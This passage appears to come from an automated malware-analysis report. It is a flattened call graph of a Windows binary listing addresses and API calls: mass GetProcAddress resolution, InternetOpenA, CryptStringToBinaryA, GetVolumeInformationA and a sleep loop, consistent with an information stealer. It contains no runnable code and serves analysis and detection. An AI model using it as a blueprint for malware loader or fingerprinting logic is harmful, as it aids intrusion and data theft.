lstrcpy 13843->13844 13845 3c684e 13844->13845 13846 3ca9b0 4 API calls 13845->13846 13847 3c6867 13846->13847 13848 3ca8a0 lstrcpy 13847->13848 13849 3c6870 13848->13849 13850 3ca9b0 4 API calls 13849->13850 13851 3c688a 13850->13851 13852 3ca8a0 lstrcpy 13851->13852 13853 3c6893 13852->13853 13854 3ca9b0 4 API calls 13853->13854 13855 3c68ac 13854->13855 13856 3ca8a0 lstrcpy 13855->13856 13857 3c68b5 13856->13857 13858 3ca9b0 4 API calls 13857->13858 13859 3c68cf 13858->13859 13860 3ca8a0 lstrcpy 13859->13860 13861 3c68d8 13860->13861 13862 3ca9b0 4 API calls 13861->13862 13863 3c68f3 13862->13863 13864 3ca8a0 lstrcpy 13863->13864 13865 3c68fc 13864->13865 13866 3ca7a0 lstrcpy 13865->13866 13867 3c6910 13866->13867 13867->13627 13869 3ca812 13868->13869 13869->13630 13871 3ca83f 13870->13871 13872 3c5b54 13871->13872 13873 3ca87b lstrcpy 13871->13873 13872->13640 13873->13872 13875 3ca8a0 lstrcpy 13874->13875 13876 3c6443 13875->13876 13877 3ca8a0 lstrcpy 13876->13877 13878 3c6455 13877->13878 13879 3ca8a0 lstrcpy 13878->13879 13880 3c6467 13879->13880 13881 3ca8a0 lstrcpy 13880->13881 13882 3c5b86 13881->13882 13882->13646 13884 3b45c0 2 API calls 13883->13884 13885 3b26b4 13884->13885 13886 3b45c0 2 API calls 13885->13886 13887 3b26d7 13886->13887 13888 3b45c0 2 API calls 13887->13888 13889 3b26f0 13888->13889 13890 3b45c0 2 API calls 13889->13890 13891 3b2709 13890->13891 13892 3b45c0 2 API calls 13891->13892 13893 3b2736 13892->13893 13894 3b45c0 2 API calls 13893->13894 13895 3b274f 13894->13895 13896 3b45c0 2 API calls 13895->13896 13897 3b2768 13896->13897 13898 3b45c0 2 API calls 13897->13898 13899 3b2795 13898->13899 13900 3b45c0 2 API calls 13899->13900 13901 3b27ae 13900->13901 13902 3b45c0 2 API calls 13901->13902 13903 3b27c7 13902->13903 13904 3b45c0 2 API calls 13903->13904 13905 3b27e0 13904->13905 13906 3b45c0 2 API calls 13905->13906 13907 3b27f9 13906->13907 13908 3b45c0 2 API calls 13907->13908 13909 3b2812 13908->13909 13910 3b45c0 2 API calls 13909->13910 13911 3b282b 13910->13911 13912 3b45c0 2 API calls 13911->13912 13913 3b2844 13912->13913 13914 3b45c0 2 API calls 13913->13914 13915 3b285d 13914->13915 13916 3b45c0 2 API calls 13915->13916 13917 3b2876 13916->13917 13918 3b45c0 2 API calls 13917->13918 13919 3b288f 13918->13919 13920 3b45c0 2 API calls 13919->13920 13921 3b28a8 13920->13921 13922 3b45c0 2 API calls 13921->13922 13923 3b28c1 13922->13923 13924 3b45c0 2 API calls 13923->13924 13925 3b28da 13924->13925 13926 3b45c0 2 API calls 13925->13926 13927 3b28f3 13926->13927 13928 3b45c0 2 API calls 13927->13928 13929 3b290c 13928->13929 13930 3b45c0 2 API calls 13929->13930 13931 3b2925 13930->13931 13932 3b45c0 2 API calls 13931->13932 13933 3b293e 13932->13933 13934 3b45c0 2 API calls 13933->13934 13935 3b2957 13934->13935 13936 3b45c0 2 API calls 13935->13936 13937 3b2970 13936->13937 13938 3b45c0 2 API calls 13937->13938 13939 3b2989 13938->13939 13940 3b45c0 2 API calls 13939->13940 13941 3b29a2 13940->13941 13942 3b45c0 2 API calls 13941->13942 13943 3b29bb 13942->13943 13944 3b45c0 2 API calls 13943->13944 13945 3b29d4 13944->13945 13946 3b45c0 2 API calls 13945->13946 13947 3b29ed 13946->13947 13948 3b45c0 2 API calls 13947->13948 13949 3b2a06 13948->13949 13950 3b45c0 2 API calls 13949->13950 13951 3b2a1f 13950->13951 13952 3b45c0 2 API calls 13951->13952 13953 3b2a38 13952->13953 13954 3b45c0 2 API calls 13953->13954 13955 3b2a51 13954->13955 13956 3b45c0 2 API calls 13955->13956 13957 3b2a6a 13956->13957 13958 3b45c0 2 API calls 13957->13958 13959 3b2a83 13958->13959 13960 3b45c0 2 API calls 13959->13960 13961 3b2a9c 13960->13961 13962 3b45c0 2 API calls 13961->13962 13963 3b2ab5 13962->13963 13964 3b45c0 2 API calls 13963->13964 13965 3b2ace 13964->13965 13966 3b45c0 2 API calls 13965->13966 13967 3b2ae7 13966->13967 13968 3b45c0 2 API calls 13967->13968 13969 3b2b00 13968->13969 13970 3b45c0 2 API calls 13969->13970 13971 3b2b19 13970->13971 13972 3b45c0 2 API calls 13971->13972 13973 3b2b32 13972->13973 13974 3b45c0 2 API calls 13973->13974 13975 3b2b4b 13974->13975 13976 3b45c0 2 API calls 13975->13976 13977 3b2b64 13976->13977 13978 3b45c0 2 API calls 13977->13978 13979 3b2b7d 13978->13979 13980 3b45c0 2 API calls 13979->13980 13981 3b2b96 13980->13981 13982 3b45c0 2 API calls 13981->13982 13983 3b2baf 13982->13983 13984 3b45c0 2 API calls 13983->13984 13985 3b2bc8 13984->13985 13986 3b45c0 2 API calls 13985->13986 13987 3b2be1 13986->13987 13988 3b45c0 2 API calls 13987->13988 13989 3b2bfa 13988->13989 13990 3b45c0 2 API calls 13989->13990 13991 3b2c13 13990->13991 13992 3b45c0 2 API calls 13991->13992 13993 3b2c2c 13992->13993 13994 3b45c0 2 API calls 13993->13994 13995 3b2c45 13994->13995 13996 3b45c0 2 API calls 13995->13996 13997 3b2c5e 13996->13997 13998 3b45c0 2 API calls 13997->13998 13999 3b2c77 13998->13999 14000 3b45c0 2 API calls 13999->14000 14001 3b2c90 14000->14001 14002 3b45c0 2 API calls 14001->14002 14003 3b2ca9 14002->14003 14004 3b45c0 2 API calls 14003->14004 14005 3b2cc2 14004->14005 14006 3b45c0 2 API calls 14005->14006 14007 3b2cdb 14006->14007 14008 3b45c0 2 API calls 14007->14008 14009 3b2cf4 14008->14009 14010 3b45c0 2 API calls 14009->14010 14011 3b2d0d 14010->14011 14012 3b45c0 2 API calls 14011->14012 14013 3b2d26 14012->14013 14014 3b45c0 2 API calls 14013->14014 14015 3b2d3f 14014->14015 14016 3b45c0 2 API calls 14015->14016 14017 3b2d58 14016->14017 14018 3b45c0 2 API calls 14017->14018 14019 3b2d71 14018->14019 14020 3b45c0 2 API calls 14019->14020 14021 3b2d8a 14020->14021 14022 3b45c0 2 API calls 14021->14022 14023 3b2da3 14022->14023 14024 3b45c0 2 API calls 14023->14024 14025 3b2dbc 14024->14025 14026 3b45c0 2 API calls 14025->14026 14027 3b2dd5 14026->14027 14028 3b45c0 2 API calls 14027->14028 14029 3b2dee 14028->14029 14030 3b45c0 2 API calls 14029->14030 14031 3b2e07 14030->14031 14032 3b45c0 2 API calls 14031->14032 14033 3b2e20 14032->14033 14034 3b45c0 2 API calls 14033->14034 14035 3b2e39 14034->14035 14036 3b45c0 2 API calls 14035->14036 14037 3b2e52 14036->14037 14038 3b45c0 2 API calls 14037->14038 14039 3b2e6b 14038->14039 14040 3b45c0 2 API calls 14039->14040 14041 3b2e84 14040->14041 14042 3b45c0 2 API calls 14041->14042 14043 3b2e9d 14042->14043 14044 3b45c0 2 API calls 14043->14044 14045 3b2eb6 14044->14045 14046 3b45c0 2 API calls 14045->14046 14047 3b2ecf 14046->14047 14048 3b45c0 2 API calls 14047->14048 14049 3b2ee8 14048->14049 14050 3b45c0 2 API calls 14049->14050 14051 3b2f01 14050->14051 14052 3b45c0 2 API calls 14051->14052 14053 3b2f1a 14052->14053 14054 3b45c0 2 API calls 14053->14054 14055 3b2f33 14054->14055 14056 3b45c0 2 API calls 14055->14056 14057 3b2f4c 14056->14057 14058 3b45c0 2 API calls 14057->14058 14059 3b2f65 14058->14059 14060 3b45c0 2 API calls 14059->14060 14061 3b2f7e 14060->14061 14062 3b45c0 2 API calls 14061->14062 14063 3b2f97 14062->14063 14064 3b45c0 2 API calls 14063->14064 14065 3b2fb0 14064->14065 14066 3b45c0 2 API calls 14065->14066 14067 3b2fc9 14066->14067 14068 3b45c0 2 API calls 14067->14068 14069 3b2fe2 14068->14069 14070 3b45c0 2 API calls 14069->14070 14071 3b2ffb 14070->14071 14072 3b45c0 2 API calls 14071->14072 14073 3b3014 14072->14073 14074 3b45c0 2 API calls 14073->14074 14075 3b302d 14074->14075 14076 3b45c0 2 API calls 14075->14076 14077 3b3046 14076->14077 14078 3b45c0 2 API calls 14077->14078 14079 3b305f 14078->14079 14080 3b45c0 2 API calls 14079->14080 14081 3b3078 14080->14081 14082 3b45c0 2 API calls 14081->14082 14083 3b3091 14082->14083 14084 3b45c0 2 API calls 14083->14084 14085 3b30aa 14084->14085 14086 3b45c0 2 API calls 14085->14086 14087 3b30c3 14086->14087 14088 3b45c0 2 API calls 14087->14088 14089 3b30dc 14088->14089 14090 3b45c0 2 API calls 14089->14090 14091 3b30f5 14090->14091 14092 3b45c0 2 API calls 14091->14092 14093 3b310e 14092->14093 14094 3b45c0 2 API calls 14093->14094 14095 3b3127 14094->14095 14096 3b45c0 2 API calls 14095->14096 14097 3b3140 14096->14097 14098 3b45c0 2 API calls 14097->14098 14099 3b3159 14098->14099 14100 3b45c0 2 API calls 14099->14100 14101 3b3172 14100->14101 14102 3b45c0 2 API calls 14101->14102 14103 3b318b 14102->14103 14104 3b45c0 2 API calls 14103->14104 14105 3b31a4 14104->14105 14106 3b45c0 2 API calls 14105->14106 14107 3b31bd 14106->14107 14108 3b45c0 2 API calls 14107->14108 14109 3b31d6 14108->14109 14110 3b45c0 2 API calls 14109->14110 14111 3b31ef 14110->14111 14112 3b45c0 2 API calls 14111->14112 14113 3b3208 14112->14113 14114 3b45c0 2 API calls 14113->14114 14115 3b3221 14114->14115 14116 3b45c0 2 API calls 14115->14116 14117 3b323a 14116->14117 14118 3b45c0 2 API calls 14117->14118 14119 3b3253 14118->14119 14120 3b45c0 2 API calls 14119->14120 14121 3b326c 14120->14121 14122 3b45c0 2 API calls 14121->14122 14123 3b3285 14122->14123 14124 3b45c0 2 API calls 14123->14124 14125 3b329e 14124->14125 14126 3b45c0 2 API calls 14125->14126 14127 3b32b7 14126->14127 14128 3b45c0 2 API calls 14127->14128 14129 3b32d0 14128->14129 14130 3b45c0 2 API calls 14129->14130 14131 3b32e9 14130->14131 14132 3b45c0 2 API calls 14131->14132 14133 3b3302 14132->14133 14134 3b45c0 2 API calls 14133->14134 14135 3b331b 14134->14135 14136 3b45c0 2 API calls 14135->14136 14137 3b3334 14136->14137 14138 3b45c0 2 API calls 14137->14138 14139 3b334d 14138->14139 14140 3b45c0 2 API calls 14139->14140 14141 3b3366 14140->14141 14142 3b45c0 2 API calls 14141->14142 14143 3b337f 14142->14143 14144 3b45c0 2 API calls 14143->14144 14145 3b3398 14144->14145 14146 3b45c0 2 API calls 14145->14146 14147 3b33b1 14146->14147 14148 3b45c0 2 API calls 14147->14148 14149 3b33ca 14148->14149 14150 3b45c0 2 API calls 14149->14150 14151 3b33e3 14150->14151 14152 3b45c0 2 API calls 14151->14152 14153 3b33fc 14152->14153 14154 3b45c0 2 API calls 14153->14154 14155 3b3415 14154->14155 14156 3b45c0 2 API calls 14155->14156 14157 3b342e 14156->14157 14158 3b45c0 2 API calls 14157->14158 14159 3b3447 14158->14159 14160 3b45c0 2 API calls 14159->14160 14161 3b3460 14160->14161 14162 3b45c0 2 API calls 14161->14162 14163 3b3479 14162->14163 14164 3b45c0 2 API calls 14163->14164 14165 3b3492 14164->14165 14166 3b45c0 2 API calls 14165->14166 14167 3b34ab 14166->14167 14168 3b45c0 2 API calls 14167->14168 14169 3b34c4 14168->14169 14170 3b45c0 2 API calls 14169->14170 14171 3b34dd 14170->14171 14172 3b45c0 2 API calls 14171->14172 14173 3b34f6 14172->14173 14174 3b45c0 2 API calls 14173->14174 14175 3b350f 14174->14175 14176 3b45c0 2 API calls 14175->14176 14177 3b3528 14176->14177 14178 3b45c0 2 API calls 14177->14178 14179 3b3541 14178->14179 14180 3b45c0 2 API calls 14179->14180 14181 3b355a 14180->14181 14182 3b45c0 2 API calls 14181->14182 14183 3b3573 14182->14183 14184 3b45c0 2 API calls 14183->14184 14185 3b358c 14184->14185 14186 3b45c0 2 API calls 14185->14186 14187 3b35a5 14186->14187 14188 3b45c0 2 API calls 14187->14188 14189 3b35be 14188->14189 14190 3b45c0 2 API calls 14189->14190 14191 3b35d7 14190->14191 14192 3b45c0 2 API calls 14191->14192 14193 3b35f0 14192->14193 14194 3b45c0 2 API calls 14193->14194 14195 3b3609 14194->14195 14196 3b45c0 2 API calls 14195->14196 14197 3b3622 14196->14197 14198 3b45c0 2 API calls 14197->14198 14199 3b363b 14198->14199 14200 3b45c0 2 API calls 14199->14200 14201 3b3654 14200->14201 14202 3b45c0 2 API calls 14201->14202 14203 3b366d 14202->14203 14204 3b45c0 2 API calls 14203->14204 14205 3b3686 14204->14205 14206 3b45c0 2 API calls 14205->14206 14207 3b369f 14206->14207 14208 3b45c0 2 API calls 14207->14208 14209 3b36b8 14208->14209 14210 3b45c0 2 API calls 14209->14210 14211 3b36d1 14210->14211 14212 3b45c0 2 API calls 14211->14212 14213 3b36ea 14212->14213 14214 3b45c0 2 API calls 14213->14214 14215 3b3703 14214->14215 14216 3b45c0 2 API calls 14215->14216 14217 3b371c 14216->14217 14218 3b45c0 2 API calls 14217->14218 14219 3b3735 14218->14219 14220 3b45c0 2 API calls 14219->14220 14221 3b374e 14220->14221 14222 3b45c0 2 API calls 14221->14222 14223 3b3767 14222->14223 14224 3b45c0 2 API calls 14223->14224 14225 3b3780 14224->14225 14226 3b45c0 2 API calls 14225->14226 14227 3b3799 14226->14227 14228 3b45c0 2 API calls 14227->14228 14229 3b37b2 14228->14229 14230 3b45c0 2 API calls 14229->14230 14231 3b37cb 14230->14231 14232 3b45c0 2 API calls 14231->14232 14233 3b37e4 14232->14233 14234 3b45c0 2 API calls 14233->14234 14235 3b37fd 14234->14235 14236 3b45c0 2 API calls 14235->14236 14237 3b3816 14236->14237 14238 3b45c0 2 API calls 14237->14238 14239 3b382f 14238->14239 14240 3b45c0 2 API calls 14239->14240 14241 3b3848 14240->14241 14242 3b45c0 2 API calls 14241->14242 14243 3b3861 14242->14243 14244 3b45c0 2 API calls 14243->14244 14245 3b387a 14244->14245 14246 3b45c0 2 API calls 14245->14246 14247 3b3893 14246->14247 14248 3b45c0 2 API calls 14247->14248 14249 3b38ac 14248->14249 14250 3b45c0 2 API calls 14249->14250 14251 3b38c5 14250->14251 14252 3b45c0 2 API calls 14251->14252 14253 3b38de 14252->14253 14254 3b45c0 2 API calls 14253->14254 14255 3b38f7 14254->14255 14256 3b45c0 2 API calls 14255->14256 14257 3b3910 14256->14257 14258 3b45c0 2 API calls 14257->14258 14259 3b3929 14258->14259 14260 3b45c0 2 API calls 14259->14260 14261 3b3942 14260->14261 14262 3b45c0 2 API calls 14261->14262 14263 3b395b 14262->14263 14264 3b45c0 2 API calls 14263->14264 14265 3b3974 14264->14265 14266 3b45c0 2 API calls 14265->14266 14267 3b398d 14266->14267 14268 3b45c0 2 API calls 14267->14268 14269 3b39a6 14268->14269 14270 3b45c0 2 API calls 14269->14270 14271 3b39bf 14270->14271 14272 3b45c0 2 API calls 14271->14272 14273 3b39d8 14272->14273 14274 3b45c0 2 API calls 14273->14274 14275 3b39f1 14274->14275 14276 3b45c0 2 API calls 14275->14276 14277 3b3a0a 14276->14277 14278 3b45c0 2 API calls 14277->14278 14279 3b3a23 14278->14279 14280 3b45c0 2 API calls 14279->14280 14281 3b3a3c 14280->14281 14282 3b45c0 2 API calls 14281->14282 14283 3b3a55 14282->14283 14284 3b45c0 2 API calls 14283->14284 14285 3b3a6e 14284->14285 14286 3b45c0 2 API calls 14285->14286 14287 3b3a87 14286->14287 14288 3b45c0 2 API calls 14287->14288 14289 3b3aa0 14288->14289 14290 3b45c0 2 API calls 14289->14290 14291 3b3ab9 14290->14291 14292 3b45c0 2 API calls 14291->14292 14293 3b3ad2 14292->14293 14294 3b45c0 2 API calls 14293->14294 14295 3b3aeb 14294->14295 14296 3b45c0 2 API calls 14295->14296 14297 3b3b04 14296->14297 14298 3b45c0 2 API calls 14297->14298 14299 3b3b1d 14298->14299 14300 3b45c0 2 API calls 14299->14300 14301 3b3b36 14300->14301 14302 3b45c0 2 API calls 14301->14302 14303 3b3b4f 14302->14303 14304 3b45c0 2 API calls 14303->14304 14305 3b3b68 14304->14305 14306 3b45c0 2 API calls 14305->14306 14307 3b3b81 14306->14307 14308 3b45c0 2 API calls 14307->14308 14309 3b3b9a 14308->14309 14310 3b45c0 2 API calls 14309->14310 14311 3b3bb3 14310->14311 14312 3b45c0 2 API calls 14311->14312 14313 3b3bcc 14312->14313 14314 3b45c0 2 API calls 14313->14314 14315 3b3be5 14314->14315 14316 3b45c0 2 API calls 14315->14316 14317 3b3bfe 14316->14317 14318 3b45c0 2 API calls 14317->14318 14319 3b3c17 14318->14319 14320 3b45c0 2 API calls 14319->14320 14321 3b3c30 14320->14321 14322 3b45c0 2 API calls 14321->14322 14323 3b3c49 14322->14323 14324 3b45c0 2 API calls 14323->14324 14325 3b3c62 14324->14325 14326 3b45c0 2 API calls 14325->14326 14327 3b3c7b 14326->14327 14328 3b45c0 2 API calls 14327->14328 14329 3b3c94 14328->14329 14330 3b45c0 2 API calls 14329->14330 14331 3b3cad 14330->14331 14332 3b45c0 2 API calls 14331->14332 14333 3b3cc6 14332->14333 14334 3b45c0 2 API calls 14333->14334 14335 3b3cdf 14334->14335 14336 3b45c0 2 API calls 14335->14336 14337 3b3cf8 14336->14337 14338 3b45c0 2 API calls 14337->14338 14339 3b3d11 14338->14339 14340 3b45c0 2 API calls 14339->14340 14341 3b3d2a 14340->14341 14342 3b45c0 2 API calls 14341->14342 14343 3b3d43 14342->14343 14344 3b45c0 2 API calls 14343->14344 14345 3b3d5c 14344->14345 14346 3b45c0 2 API calls 14345->14346 14347 3b3d75 14346->14347 14348 3b45c0 2 API calls 14347->14348 14349 3b3d8e 14348->14349 14350 3b45c0 2 API calls 14349->14350 14351 3b3da7 14350->14351 14352 3b45c0 2 API calls 14351->14352 14353 3b3dc0 14352->14353 14354 3b45c0 2 API calls 14353->14354 14355 3b3dd9 14354->14355 14356 3b45c0 2 API calls 14355->14356 14357 3b3df2 14356->14357 14358 3b45c0 2 API calls 14357->14358 14359 3b3e0b 14358->14359 14360 3b45c0 2 API calls 14359->14360 14361 3b3e24 14360->14361 14362 3b45c0 2 API calls 14361->14362 14363 3b3e3d 14362->14363 14364 3b45c0 2 API calls 14363->14364 14365 3b3e56 14364->14365 14366 3b45c0 2 API calls 14365->14366 14367 3b3e6f 14366->14367 14368 3b45c0 2 API calls 14367->14368 14369 3b3e88 14368->14369 14370 3b45c0 2 API calls 14369->14370 14371 3b3ea1 14370->14371 14372 3b45c0 2 API calls 14371->14372 14373 3b3eba 14372->14373 14374 3b45c0 2 API calls 14373->14374 14375 3b3ed3 14374->14375 14376 3b45c0 2 API calls 14375->14376 14377 3b3eec 14376->14377 14378 3b45c0 2 API calls 14377->14378 14379 3b3f05 14378->14379 14380 3b45c0 2 API calls 14379->14380 14381 3b3f1e 14380->14381 14382 3b45c0 2 API calls 14381->14382 14383 3b3f37 14382->14383 14384 3b45c0 2 API calls 14383->14384 14385 3b3f50 14384->14385 14386 3b45c0 2 API calls 14385->14386 14387 3b3f69 14386->14387 14388 3b45c0 2 API calls 14387->14388 14389 3b3f82 14388->14389 14390 3b45c0 2 API calls 14389->14390 14391 3b3f9b 14390->14391 14392 3b45c0 2 API calls 14391->14392 14393 3b3fb4 14392->14393 14394 3b45c0 2 API calls 14393->14394 14395 3b3fcd 14394->14395 14396 3b45c0 2 API calls 14395->14396 14397 3b3fe6 14396->14397 14398 3b45c0 2 API calls 14397->14398 14399 3b3fff 14398->14399 14400 3b45c0 2 API calls 14399->14400 14401 3b4018 14400->14401 14402 3b45c0 2 API calls 14401->14402 14403 3b4031 14402->14403 14404 3b45c0 2 API calls 14403->14404 14405 3b404a 14404->14405 14406 3b45c0 2 API calls 14405->14406 14407 3b4063 14406->14407 14408 3b45c0 2 API calls 14407->14408 14409 3b407c 14408->14409 14410 3b45c0 2 API calls 14409->14410 14411 3b4095 14410->14411 14412 3b45c0 2 API calls 14411->14412 14413 3b40ae 14412->14413 14414 3b45c0 2 API calls 14413->14414 14415 3b40c7 14414->14415 14416 3b45c0 2 API calls 14415->14416 14417 3b40e0 14416->14417 14418 3b45c0 2 API calls 14417->14418 14419 3b40f9 14418->14419 14420 3b45c0 2 API calls 14419->14420 14421 3b4112 14420->14421 14422 3b45c0 2 API calls 14421->14422 14423 3b412b 14422->14423 14424 3b45c0 2 API calls 14423->14424 14425 3b4144 14424->14425 14426 3b45c0 2 API calls 14425->14426 14427 3b415d 14426->14427 14428 3b45c0 2 API calls 14427->14428 14429 3b4176 14428->14429 14430 3b45c0 2 API calls 14429->14430 14431 3b418f 14430->14431 14432 3b45c0 2 API calls 14431->14432 14433 3b41a8 14432->14433 14434 3b45c0 2 API calls 14433->14434 14435 3b41c1 14434->14435 14436 3b45c0 2 API calls 14435->14436 14437 3b41da 14436->14437 14438 3b45c0 2 API calls 14437->14438 14439 3b41f3 14438->14439 14440 3b45c0 2 API calls 14439->14440 14441 3b420c 14440->14441 14442 3b45c0 2 API calls 14441->14442 14443 3b4225 14442->14443 14444 3b45c0 2 API calls 14443->14444 14445 3b423e 14444->14445 14446 3b45c0 2 API calls 14445->14446 14447 3b4257 14446->14447 14448 3b45c0 2 API calls 14447->14448 14449 3b4270 14448->14449 14450 3b45c0 2 API calls 14449->14450 14451 3b4289 14450->14451 14452 3b45c0 2 API calls 14451->14452 14453 3b42a2 14452->14453 14454 3b45c0 2 API calls 14453->14454 14455 3b42bb 14454->14455 14456 3b45c0 2 API calls 14455->14456 14457 3b42d4 14456->14457 14458 3b45c0 2 API calls 14457->14458 14459 3b42ed 14458->14459 14460 3b45c0 2 API calls 14459->14460 14461 3b4306 14460->14461 14462 3b45c0 2 API calls 14461->14462 14463 3b431f 14462->14463 14464 3b45c0 2 API calls 14463->14464 14465 3b4338 14464->14465 14466 3b45c0 2 API calls 14465->14466 14467 3b4351 14466->14467 14468 3b45c0 2 API calls 14467->14468 14469 3b436a 14468->14469 14470 3b45c0 2 API calls 14469->14470 14471 3b4383 14470->14471 14472 3b45c0 2 API calls 14471->14472 14473 3b439c 14472->14473 14474 3b45c0 2 API calls 14473->14474 14475 3b43b5 14474->14475 14476 3b45c0 2 API calls 14475->14476 14477 3b43ce 14476->14477 14478 3b45c0 2 API calls 14477->14478 14479 3b43e7 14478->14479 14480 3b45c0 2 API calls 14479->14480 14481 3b4400 14480->14481 14482 3b45c0 2 API calls 14481->14482 14483 3b4419 14482->14483 14484 3b45c0 2 API calls 14483->14484 14485 3b4432 14484->14485 14486 3b45c0 2 API calls 14485->14486 14487 3b444b 14486->14487 14488 3b45c0 2 API calls 14487->14488 14489 3b4464 14488->14489 14490 3b45c0 2 API calls 14489->14490 14491 3b447d 14490->14491 14492 3b45c0 2 API calls 14491->14492 14493 3b4496 14492->14493 14494 3b45c0 2 API calls 14493->14494 14495 3b44af 14494->14495 14496 3b45c0 2 API calls 14495->14496 14497 3b44c8 14496->14497 14498 3b45c0 2 API calls 14497->14498 14499 3b44e1 14498->14499 14500 3b45c0 2 API calls 14499->14500 14501 3b44fa 14500->14501 14502 3b45c0 2 API calls 14501->14502 14503 3b4513 14502->14503 14504 3b45c0 2 API calls 14503->14504 14505 3b452c 14504->14505 14506 3b45c0 2 API calls 14505->14506 14507 3b4545 14506->14507 14508 3b45c0 2 API calls 14507->14508 14509 3b455e 14508->14509 14510 3b45c0 2 API calls 14509->14510 14511 3b4577 14510->14511 14512 3b45c0 2 API calls 14511->14512 14513 3b4590 14512->14513 14514 3b45c0 2 API calls 14513->14514 14515 3b45a9 14514->14515 14516 3c9c10 14515->14516 14517 3ca036 8 API calls 14516->14517 14518 3c9c20 43 API calls 14516->14518 14519 3ca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14517->14519 14520 3ca146 14517->14520 14518->14517 14519->14520 14521 3ca216 14520->14521 14522 3ca153 8 API calls 14520->14522 14523 3ca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14521->14523 14524 3ca298 14521->14524 14522->14521 14523->14524 14525 3ca2a5 6 API calls 14524->14525 14526 3ca337 14524->14526 14525->14526 14527 3ca41f 14526->14527 14528 3ca344 9 API calls 14526->14528 14529 3ca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14527->14529 14530 3ca4a2 14527->14530 14528->14527 14529->14530 14531 3ca4dc 14530->14531 14532 3ca4ab GetProcAddress GetProcAddress 14530->14532 14533 3ca515 14531->14533 14534 3ca4e5 GetProcAddress GetProcAddress 14531->14534 14532->14531 14535 3ca612 14533->14535 14536 3ca522 10 API calls 14533->14536 14534->14533 14537 3ca67d 14535->14537 14538 3ca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14535->14538 14536->14535 14539 3ca69e 14537->14539 14540 3ca686 GetProcAddress 14537->14540 14538->14537 14541 3c5ca3 14539->14541 14542 3ca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14539->14542 14540->14539 14543 3b1590 14541->14543 14542->14541 15664 3b1670 14543->15664 14546 3ca7a0 lstrcpy 14547 3b15b5 14546->14547 14548 3ca7a0 lstrcpy 14547->14548 14549 3b15c7 14548->14549 14550 3ca7a0 lstrcpy 14549->14550 14551 3b15d9 14550->14551 14552 3ca7a0 lstrcpy 14551->14552 14553 3b1663 14552->14553 14554 3c5510 14553->14554 14555 3c5521 14554->14555 14556 3ca820 2 API calls 14555->14556 14557 3c552e 14556->14557 14558 3ca820 2 API calls 14557->14558 14559 3c553b 14558->14559 14560 3ca820 2 API calls 14559->14560 14561 3c5548 14560->14561 14562 3ca740 lstrcpy 14561->14562 14563 3c5555 14562->14563 14564 3ca740 lstrcpy 14563->14564 14565 3c5562 14564->14565 14566 3ca740 lstrcpy 14565->14566 14567 3c556f 14566->14567 14568 3ca740 lstrcpy 14567->14568 14583 3c557c 14568->14583 14569 3ca740 lstrcpy 14569->14583 14570 3ca7a0 lstrcpy 14570->14583 14571 3c5643 StrCmpCA 14571->14583 14572 3c56a0 StrCmpCA 14573 3c57dc 14572->14573 14572->14583 14574 3ca8a0 lstrcpy 14573->14574 14575 3c57e8 14574->14575 14577 3ca820 2 API calls 14575->14577 14576 3ca820 lstrlen lstrcpy 14576->14583 14578 3c57f6 14577->14578 14581 3ca820 2 API calls 14578->14581 14579 3c5856 StrCmpCA 14582 3c5991 14579->14582 14579->14583 14580 3c51f0 20 API calls 14580->14583 14584 3c5805 14581->14584 14585 3ca8a0 lstrcpy 14582->14585 14583->14569 14583->14570 14583->14571 14583->14572 14583->14576 14583->14579 14583->14580 14587 3b1590 lstrcpy 14583->14587 14591 3c5a0b StrCmpCA 14583->14591 14592 3c52c0 25 API calls 14583->14592 14598 3ca8a0 lstrcpy 14583->14598 14604 3c578a StrCmpCA 14583->14604 14607 3c593f StrCmpCA 14583->14607 14586 3b1670 lstrcpy 14584->14586 14588 3c599d 14585->14588 14608 3c5811 14586->14608 14587->14583 14589 3ca820 2 API calls 14588->14589 14590 3c59ab 14589->14590 14593 3ca820 2 API calls 14590->14593 14594 3c5a28 14591->14594 14595 3c5a16 Sleep 14591->14595 14592->14583 14596 3c59ba 14593->14596 14597 3ca8a0 lstrcpy 14594->14597 14595->14583 14599 3b1670 lstrcpy 14596->14599 14600 3c5a34 14597->14600 14598->14583 14599->14608 14601 3ca820 2 API calls 14600->14601 14602 3c5a43 14601->14602 14603 3ca820 2 API calls 14602->14603 14605 3c5a52 14603->14605 14604->14583 14606 3b1670 lstrcpy 14605->14606 14606->14608 14607->14583 14608->13661 14610 3c754c 14609->14610 14611 3c7553 GetVolumeInformationA 14609->14611 14610->14611 14615 3c7591 14611->14615 14612 3c75fc GetProcessHeap RtlAllocateHeap 14613 3c7628 wsprintfA 14612->14613 14614 3c7619 14612->14614 14617 3ca740 lstrcpy 14613->14617 14616 3ca740 lstrcpy 14614->14616 14615->14612 14618 3c5da7 14616->14618 14617->14618 14618->13682 14620 3ca7a0 lstrcpy 14619->14620 14621 3b4899 14620->14621 15673 3b47b0 14621->15673 14623 3b48a5 14624 3ca740 lstrcpy 14623->14624 14625 3b48d7 14624->14625 14626 3ca740 lstrcpy 14625->14626 14627 3b48e4 14626->14627 14628 3ca740 lstrcpy 14627->14628 14629 3b48f1 14628->14629 14630 3ca740 lstrcpy 14629->14630 14631 3b48fe 14630->14631 14632 3ca740 lstrcpy 14631->14632 14633 3b490b InternetOpenA StrCmpCA 14632->14633 14634 3b4944 14633->14634 14635 3b4ecb InternetCloseHandle 14634->14635 15679 3c8b60 14634->15679 14636 3b4ee8 14635->14636 15694 3b9ac0 CryptStringToBinaryA 14636->15694 14638 3b4963 15687 3ca920 14638->15687 14641 3b4976 14643 3ca8a0 lstrcpy 14641->14643 14648 3b497f 14643->14648 14644 3ca820 2 API calls 14645 3b4f05 14644->14645 14647 3ca9b0 4 API calls 14645->14647 14646 3b4f27 codecvt 14650 3ca7a0 lstrcpy 14646->14650 14649 3b4f1b 14647->14649 14652 3ca9b0 4 API calls 14648->14652 14651 3ca8a0 lstrcpy 14649->14651 14663 3b4f57 14650->14663 14651->14646 14653 3b49a9 14652->14653 14654 3ca8a0 lstrcpy 14653->14654 14655 3b49b2 14654->14655 14656 3ca9b0 4 API calls 14655->14656 14657 3b49d1 14656->14657 14658 3ca8a0 lstrcpy 14657->14658 14659 3b49da 14658->14659 14660 3ca920 3 API calls 14659->14660 14661 3b49f8 14660->14661 14662 3ca8a0 lstrcpy 14661->14662 14664 3b4a01 14662->14664 14663->13685 14665 